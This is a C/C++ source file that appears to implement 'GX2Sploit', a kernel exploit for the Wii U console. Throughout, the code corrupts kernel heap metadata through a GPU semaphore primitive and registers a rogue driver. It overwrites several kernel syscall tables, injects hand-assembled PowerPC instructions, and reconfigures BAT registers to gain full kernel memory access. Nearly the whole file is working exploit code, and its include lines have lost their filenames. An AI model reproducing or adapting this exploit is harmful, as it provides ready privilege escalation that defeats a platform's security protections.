#include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "ElfUtils.h" #include "gx2sploit.h" #define JIT_ADDRESS 0x01800000 #define KERN_HEAP 0xFF200000 #define KERN_HEAP_PHYS 0x1B800000 #define KERN_CODE_READ 0xFFF023D4 #define KERN_CODE_WRITE 0xFFF023F4 #define KERN_DRVPTR 0xFFEAB530 #define STARTID_OFFSET 0x08 #define METADATA_OFFSET 0x14 #define METADATA_SIZE 0x10 extern "C" void SCKernelCopyData(uint32_t addr, uint32_t src, uint32_t len); /* Find a gadget based on a sequence of words */ static void *find_gadget(uint32_t code[], uint32_t length, uint32_t gadgets_start) { uint32_t *ptr; /* Search code before JIT area first */ for (ptr = (uint32_t *) gadgets_start; ptr != (uint32_t *) JIT_ADDRESS; ptr++) { if (!memcmp(ptr, &code[0], length)) { return ptr; } } OSFatal("Failed to find gadget!"); return NULL; } /* Chadderz's kernel write function */ void __attribute__((noinline)) kern_write(const void *addr, uint32_t value) { asm volatile ( "li 3,1\n" "li 4,0\n" "mr 5,%1\n" "li 6,0\n" "li 7,0\n" "lis 8,1\n" "mr 9,%0\n" "mr %1,1\n" "li 0,0x3500\n" "sc\n" "nop\n" "mr 1,%1\n" : : "r"(addr), "r"(value) : "memory", "ctr", "lr", "0", "3", "4", "5", "6", "7", "8", "9", "10", "11", "12" ); } extern "C" void OSSwitchSecCodeGenMode(int); int exploitThread(int argc, char **argv) { OSDynLoad_Module gx2_handle; OSDynLoad_Acquire("gx2.rpl", &gx2_handle); void (*pGX2SetSemaphore)(uint64_t *sem, int action); OSDynLoad_FindExport(gx2_handle, 0, "GX2SetSemaphore", (void **) &pGX2SetSemaphore); uint32_t set_semaphore = ((uint32_t) pGX2SetSemaphore) + 0x2C; uint32_t gx2_init_attributes[9]; uint8_t *gx2CommandBuffer = (uint8_t *) memalign(0x40, 0x400000); gx2_init_attributes[0] = 1; gx2_init_attributes[1] = (uint32_t) gx2CommandBuffer; gx2_init_attributes[2] = 2; gx2_init_attributes[3] = 0x400000; gx2_init_attributes[4] = 7; gx2_init_attributes[5] = 0; gx2_init_attributes[6] = 8; gx2_init_attributes[7] = 0; gx2_init_attributes[8] = 0; GX2Init(gx2_init_attributes); //don't actually know if this is necessary? so temp? (from loadiine or hbl idk) /* Allocate space for DRVHAX */ uint32_t *drvhax = (uint32_t *) OSAllocFromSystem(0x4c, 4); /* Set the kernel heap metadata entry */ uint32_t *metadata = (uint32_t *) (KERN_HEAP + METADATA_OFFSET + (0x02000000 * METADATA_SIZE)); metadata[0] = (uint32_t) drvhax; metadata[1] = (uint32_t) -0x4c; metadata[2] = (uint32_t) -1; metadata[3] = (uint32_t) -1; /* Find stuff */ uint32_t gx2data[] = {0xfc2a0000}; uint32_t gx2data_addr = (uint32_t) find_gadget(gx2data, 0x04, 0x10000000); uint32_t doflush[] = {0xba810008, 0x8001003c, 0x7c0803a6, 0x38210038, 0x4e800020, 0x9421ffe0, 0xbf61000c, 0x7c0802a6, 0x7c7e1b78, 0x7c9f2378, 0x90010024}; void (*do_flush)(uint32_t arg0, uint32_t arg1) = (void (*)(uint32_t, uint32_t)) (((uint32_t) find_gadget(doflush, 0x2C, 0x01000000)) + 0x14); /* Modify a next ptr on the heap */ uint32_t kpaddr = KERN_HEAP_PHYS + STARTID_OFFSET; set_semaphore_phys(set_semaphore, kpaddr, gx2data_addr); set_semaphore_phys(set_semaphore, kpaddr, gx2data_addr); do_flush(0x100, 1); /* Register a new OSDriver, DRVHAX */ char drvname[6] = {'D', 'R', 'V', 'H', 'A', 'X'}; Register(drvname, 6, NULL, NULL); /* Use DRVHAX to install the read and write syscalls */ uint32_t syscalls[2] = {KERN_CODE_READ, KERN_CODE_WRITE}; DCFlushRange(syscalls, 0x04 * 2); /* Modify its save area to point to the kernel syscall table */ drvhax[0x44 / 4] = KERN_SYSCALL_TBL_1 + (0x34 * 4); CopyToSaveArea(drvname, 6, syscalls, 8); drvhax[0x44 / 4] = KERN_SYSCALL_TBL_2 + (0x34 * 4); CopyToSaveArea(drvname, 6, syscalls, 8); drvhax[0x44 / 4] = KERN_SYSCALL_TBL_3 + (0x34 * 4); CopyToSaveArea(drvname, 6, syscalls, 8); drvhax[0x44 / 4] = KERN_SYSCALL_TBL_4 + (0x34 * 4); CopyToSaveArea(drvname, 6, syscalls, 8); drvhax[0x44 / 4] = KERN_SYSCALL_TBL_5 + (0x34 * 4); CopyToSaveArea(drvname, 6, syscalls, 8); /* Clean up the heap and driver list so we can exit */ kern_write((void *) (KERN_HEAP + STARTID_OFFSET), 0); kern_write((void *) KERN_DRVPTR, drvhax[0x48 / 4]); // Install CopyData syscall kern_write((void *) (KERN_SYSCALL_TBL_1 + (0x25 * 4)), (uint32_t) 0x1800000); kern_write((void *) (KERN_SYSCALL_TBL_2 + (0x25 * 4)), (uint32_t) 0x1800000); kern_write((void *) (KERN_SYSCALL_TBL_3 + (0x25 * 4)), (uint32_t) 0x1800000); kern_write((void *) (KERN_SYSCALL_TBL_4 + (0x25 * 4)), (uint32_t) 0x1800000); kern_write((void *) (KERN_SYSCALL_TBL_5 + (0x25 * 4)), (uint32_t) 0x1800000); /* clean shutdown */ GX2Shutdown(); free(gx2CommandBuffer); return 0; } void KernelWriteU32(uint32_t addr, uint32_t value); extern "C" void SC_KernelCopyData(uint32_t dst, uint32_t src, uint32_t len); void KernelWrite(uint32_t addr, const void *data, uint32_t length) { // This is a hacky workaround, but currently it only works this way. ("data" is always on the stack, so maybe a problem with mapping values from the JIT area?) // further testing required. for (uint32_t i = 0; i < length; i += 4) { KernelWriteU32(addr + i, *(uint32_t *) (((uint32_t) data) + i)); } } void KernelWriteU32(uint32_t addr, uint32_t value) { ICInvalidateRange(&value, 4); DCFlushRange(&value, 4); uint32_t dst = (uint32_t) OSEffectiveToPhysical(addr); uint32_t src = (uint32_t) OSEffectiveToPhysical((uint32_t) &value); SC_KernelCopyData(dst, src, 4); DCFlushRange((void *) addr, 4); ICInvalidateRange((void *) addr, 4); } static void SCSetupIBAT4DBAT5() { asm volatile("sync; eieio; isync"); // Give our and the kernel full execution rights. // 00800000-01000000 => 30800000-31000000 (read/write, user/supervisor) unsigned int ibat4u = 0x008000FF; unsigned int ibat4l = 0x30800012; asm volatile("mtspr 560, %0" : : "r" (ibat4u)); asm volatile("mtspr 561, %0" : : "r" (ibat4l)); // Give our and the kernel full data access rights. // 00800000-01000000 => 30800000-31000000 (read/write, user/supervisor) unsigned int dbat5u = ibat4u; unsigned int dbat5l = ibat4l; asm volatile("mtspr 570, %0" : : "r" (dbat5u)); asm volatile("mtspr 571, %0" : : "r" (dbat5l)); asm volatile("eieio; isync"); } extern "C" void SC_0x36_SETBATS(void); int DoKernelExploit(void) { DEBUG_FUNCTION_LINE("Running GX2Sploit"); /* Make a thread to modify the semaphore */ OSThread *thread = (OSThread *) memalign(8, 0x1000); uint8_t *stack = (uint8_t *) memalign(0x40, 0x2000); OSSwitchSecCodeGenMode(0); memcpy((void *) 0x1800000, (void *) &SCKernelCopyData, 0x100); unsigned int setIBAT0Addr = 0x1800200; unsigned int *curAddr = (uint32_t *) setIBAT0Addr; curAddr[0] = 0x7C0006AC; curAddr[1] = 0x4C00012C; curAddr[2] = 0x7C7083A6; curAddr[3] = 0x7C9183A6; curAddr[4] = 0x7C0006AC; curAddr[5] = 0x4C00012C; curAddr[6] = 0x4E800020; DCFlushRange((void *) 0x1800000, 0x1000); ICInvalidateRange((void *) 0x1800000, 0x1000); OSSwitchSecCodeGenMode(1); if (OSCreateThread(thread, (OSThreadEntryPointFn) exploitThread, 0, NULL, stack + 0x2000, 0x2000, 0, 0x1) == 0) { OSFatal("Failed to create thread"); } OSResumeThread(thread); OSJoinThread(thread, 0); free(thread); free(stack); unsigned char backupBuffer[0x40]; uint32_t targetBuffer[0x40 / 4]; uint32_t targetAddress = 0x017FF000; KernelWrite((uint32_t) backupBuffer, (void *) 0x017FF000, 0x40); targetBuffer[0] = 0x7c7082a6; // mfspr r3, 528 targetBuffer[1] = 0x60630003; // ori r3, r3, 0x03 targetBuffer[2] = 0x7c7083a6; // mtspr 528, r3 targetBuffer[3] = 0x7c7282a6; // mfspr r3, 530 targetBuffer[4] = 0x60630003; // ori r3, r3, 0x03 targetBuffer[5] = 0x7c7283a6; // mtspr 530, r3 targetBuffer[6] = 0x7c0006ac; // eieio targetBuffer[7] = 0x4c00012c; // isync targetBuffer[8] = 0x3c600000 | (((uint32_t) SCSetupIBAT4DBAT5) >> 16); // lis r3, setup_syscall@h targetBuffer[9] = 0x60630000 | (((uint32_t) SCSetupIBAT4DBAT5) & 0xFFFF); // ori r3, r3, setup_syscall@l targetBuffer[10] = 0x7c6903a6; // mtctr r3 targetBuffer[11] = 0x4e800420; // bctr DCFlushRange(targetBuffer, sizeof(targetBuffer)); KernelWrite((uint32_t) targetAddress, (void *) targetBuffer, 0x40); /* set our setup syscall to an unused position */ kern_write((void *) (KERN_SYSCALL_TBL_1 + (0x36 * 4)), targetAddress); kern_write((void *) (KERN_SYSCALL_TBL_2 + (0x36 * 4)), targetAddress); kern_write((void *) (KERN_SYSCALL_TBL_3 + (0x36 * 4)), targetAddress); kern_write((void *) (KERN_SYSCALL_TBL_4 + (0x36 * 4)), targetAddress); kern_write((void *) (KERN_SYSCALL_TBL_5 + (0x36 * 4)), targetAddress); /* run our kernel code :) */ SC_0x36_SETBATS(); /* repair data */ KernelWrite(targetAddress, backupBuffer, sizeof(backupBuffer)); DCFlushRange((void *) targetAddress, sizeof(backupBuffer)); DEBUG_FUNCTION_LINE("GX2Sploit done"); return 1; }